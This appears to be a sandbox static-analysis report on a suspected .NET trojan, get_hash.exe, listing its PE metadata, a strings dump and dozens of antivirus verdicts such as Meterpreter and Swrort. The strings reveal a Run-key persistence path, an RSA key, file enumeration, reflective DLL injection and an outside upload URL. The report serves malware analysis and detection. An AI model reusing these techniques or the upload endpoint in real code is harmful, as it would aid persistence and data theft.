Static | ZeroBOX

PE Compile Time

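2021-09-11 07:10:30

Note: this value is read from the PE header. It is written by the build tool and can be altered afterwards, so treat it as a hint rather than proof of when the file was built.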

PE Imphash

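f34d5f2d4577ed6d9ceec516c1f5a744

Note: the imphash is derived only from the import table. The Imports section below lists a single import (mscoree.dll: _CorExeMain), so any executable with that same single import yields the same value. It is a weak pivot for clustering this sample.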

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00002000 | 0x00008f04 | 0x00009000 | 5.77915440408 |
| .rsrc | 0x0000c000 | 0x00000fc8 | 0x00001000 | 5.73818148829 |
| .reloc | 0x0000e000 | 0x0000000c | 0x00000200 | 0.0611628522412 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x0000c05c | 0x0000031c | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x0000c3b4 | 0x00000c14 | LANG_NEUTRAL | SUBLANG_NEUTRAL | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
+ +%+*
+ +%+*+
+R+V,0
+P+U+]8b
+_+`,.
+@+A,-
p+?+"~0
+4+9+:
+++0+5
T+%+N~
XJ+I+NKa
a+$+&~'
+(+)(*
D$$[[aYZQ
hws2_ThLw&
PPPP@P@Ph
WhunMa
v4.0.30319
#Strings
get_hash.exe
get_hash
<Module>
mscorlib
Object
System
RSA_PEM
com.github.xiangyuecn.rsacsharp
ValueType
MemberRefsProxy
SmartAssembly.HouseOfCards
Strings
GetString
SmartAssembly.Delegates
MulticastDelegate
Attribute
PoweredByAttribute
SmartAssembly.Attributes
RSACryptoServiceProvider
System.Security.Cryptography
System.Text.RegularExpressions
Func`2
MemoryStream
System.IO
Action`1
<>9__27_3
Action`2
<>9__27_4
Func`3
ResourceManager
System.Resources
CultureInfo
System.Globalization
ModuleHandle
Dictionary`2
System.Collections.Generic
get_PublicOnly
get_Success
AsymmetricAlgorithm
ToXmlString
Encoding
System.Text
get_UTF8
GetBytes
Convert
ToBase64String
get_KeySize
String
get_Length
Encrypt
Decrypt
Stream
ToArray
IDisposable
Dispose
WebResponse
System.Net
IsNullOrEmpty
FromBase64String
SignData
VerifyData
CspParameters
set_Flags
CspProviderFlags
ImportParameters
RSAParameters
System.Numerics
BigInteger
op_Multiply
op_Subtraction
op_BitwiseAnd
op_Modulus
GreatestCommonDivisor
get_One
get_Zero
op_Inequality
op_Equality
op_UnaryNegation
op_Implicit
op_RightShift
DateTime
get_Now
ModPow
Replace
Contains
WriteByte
Concat
get_Groups
GroupCollection
get_Item
Capture
get_Value
ToString
ProcessModule
System.Diagnostics
get_FileName
HttpWebResponse
get_StatusDescription
TextReader
ReadToEnd
NextMatch
StringBuilder
Append
RuntimeHelpers
System.Runtime.CompilerServices
InitializeArray
RuntimeFieldHandle
Create
HashAlgorithm
ComputeHash
FromXmlString
WebRequest
set_Method
set_ContentType
Console
WriteLine
RegistryKey
Microsoft.Win32
CreateSubKey
Process
GetCurrentProcess
get_MainModule
SetValue
Environment
GetFolderPath
SpecialFolder
Directory
GetFiles
SearchOption
set_ContentLength
SetLength
GetRequestStream
GetResponseStream
GetResponse
GetTypeFromHandle
RuntimeTypeHandle
get_Assembly
Assembly
System.Reflection
get_Chars
Substring
Monitor
System.Threading
Intern
ToInt32
GetExecutingAssembly
GetManifestResourceStream
convertToPublic
modulus
exponent
inverseQ
dOrNull
.cctor
VirtualAlloc
kernel32
CreateMemberRefsDelegates
typeID
CreateGetStringDelegate
ownerType
object
method
Invoke
BeginInvoke
IAsyncResult
AsyncCallback
callback
EndInvoke
result
RSAObject
KeySize
HasPrivate
Culture
String1
String2
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DebuggableAttribute
DebuggingModes
AssemblyTitleAttribute
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
GuidAttribute
AssemblyFileVersionAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
SuppressIldasmAttribute
CompilerGeneratedAttribute
GeneratedCodeAttribute
System.CodeDom.Compiler
DebuggerNonUserCodeAttribute
AttributeUsageAttribute
AttributeTargets
EditorBrowsableAttribute
System.ComponentModel
EditorBrowsableState
.resources
ExportParameters
Modulus
Exponent
InverseQ
op_Division
CompareTo
System.Core
Enumerable
System.Linq
Reverse
IEnumerable`1
ToByteArray
get_Ticks
Exception
Func`1
FileStream
FileMode
FileAccess
FileShare
Registry
CurrentUser
StreamReader
ResolveTypeHandle
MemberInfo
get_Name
ResolveMethodHandle
RuntimeMethodHandle
MethodBase
GetMethodFromHandle
MethodInfo
get_IsStatic
FieldInfo
get_FieldType
Delegate
CreateDelegate
GetParameters
ParameterInfo
get_ParameterType
get_ReturnType
DynamicMethod
System.Reflection.Emit
GetILGenerator
ILGenerator
OpCodes
Ldarg_0
OpCode
Ldarg_1
Ldarg_2
Ldarg_3
Ldarg_S
Tailcall
Callvirt
GetFields
BindingFlags
GetModules
Module
get_ModuleHandle
get_Module
GetMethods
Ldc_I4
get_MetadataToken
TryGetValue
S0Rpenc
WrapNonExceptionThrows
get_hash
Copyright
2021
$36f4360c-2813-484d-a959-7ad6e84a4941
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4(
#Powered by SmartAssembly 8.0.2.4779
3System.Resources.Tools.StronglyTypedResourceBuilder
15.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPa
DX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
ReflectiveDLLInjection
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC
Windows
requestedExecutionLevel
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
requestedExecutionLevel
-->
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!--
Windows
Windows
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!--
Windows
Windows Presentation Foundation (WPF)
Windows
.NET Framework 4.6 )
app.config
"EnableWindowsFormsHighDpiAutoResizing"
"true"
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
<!--
Windows
(Windows XP
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
"^1"b1 b1"
1"e1"m1"p1"
PUBLIC KEY
PRIVATE KEY
BEGIN END
PUBLIC KEY
-----BEGIN
-----END
PRIVATE KEY
Modulus
Exponent
InverseQ
<RSAKeyValue>
<Modulus>
</Modulus>
<Exponent>
</Exponent>
<InverseQ>
</InverseQ>
</RSAKeyValue>
--+.+?--+|\s+
\s*<RSAKeyValue>([<>\/\+=\w\s]+)</RSAKeyValue>\s*
<(.+?)>\s*([^<]+?)\s*</
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AppName
<RSAKeyValue><Modulus>v1VSmC20wSryFlj7cYr057j5wTdjsviY/uohnKhRs5+FZg2PqgyzZ6qftIuJ7c2m1NGEnr6wmqJcwr72KJysRzK67iQ5NRiQYQtLyruo5HcPcK73M8a1RiiOv6DtTUMVQACa8FrnJUQ0RO+ZspiX6fNUVyBVFsi5C9n8WQ3uy2WXTGHjwlTR4nj/uD9YfAnabNQ3plsz2Ujnq2FyKFAF2R5DMqGeCQvtSPm77VyrRPXBJIimajs+x0G7gduFGGVk/WxGyzOzkc1/3gawYiZa0tyyZ6GeGSORqfb8GEUdzWeXMu8CUJSGqNvtecX4Tv9B/QnzwQAVuZvO74myWVKNlQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
https://service-n246lmn7-1253514053.bj.apigw.tencentcs.com/release/UploadFileToCOSByAPIGW-1631274568
text/plain
String1
String2
{0d15f526-31f1-4d47-b720-b99d3e93f39f}
String1
String2F
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
get_hash
FileVersion
1.0.0.0
InternalName
get_hash.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
get_hash.exe
ProductName
get_hash
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
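Antivirus Signature

Each line gives the engine name followed by its verdict; "Clean" means that engine reported no detection. The NANO-Antivirus verdict names the EICAR test file, whose marker string appears twice in the strings listed above. That verdict therefore likely reflects the embedded test string rather than the rest of the sample.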
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan DeepScan:Generic.RozenaA.CB3D7401
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
BitDefender DeepScan:Generic.RozenaA.CB3D7401
K7GW Clean
CrowdStrike Clean
Baidu Clean
Cyren Clean
Symantec Meterpreter
ESET-NOD32 Clean
APEX Malicious
Paloalto Clean
ClamAV Win.Trojan.MSShellcode-7
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Marker.Win32.EICAR-Test-File.dyb
SUPERAntiSpyware Clean
Tencent Clean
Ad-Aware DeepScan:Generic.RozenaA.CB3D7401
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Generic.mg.c530826a10c7781d
Emsisoft DeepScan:Generic.RozenaA.CB3D7401 (B)
Ikarus Clean
GData DeepScan:Generic.RozenaA.CB3D7401
Jiangmin Clean
Webroot Clean
Avira Clean
MAX malware (ai score=85)
Antiy-AVL Trojan/Generic.ASCommon.153
Kingsoft Clean
Gridinsoft Clean
Arcabit DeepScan:Generic.RozenaA.CB3D7401
ViRobot Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Swrort.A
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
ALYac DeepScan:Generic.RozenaA.CB3D7401
TACHYON Clean
VBA32 Clean
Malwarebytes Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising HackTool.Swrort!1.6477 (CLASSIC)
Yandex Clean
SentinelOne Static AI - Suspicious PE
eGambit Trojan.Generic
Fortinet Clean
BitDefenderTheta Gen:NN.ZemsilF.34142.cm0@aiHHren
AVG Win32:Swrort-S [Trj]
Avast Win32:Swrort-S [Trj]
MaxSecure Virus.test.c
No IRMA results available.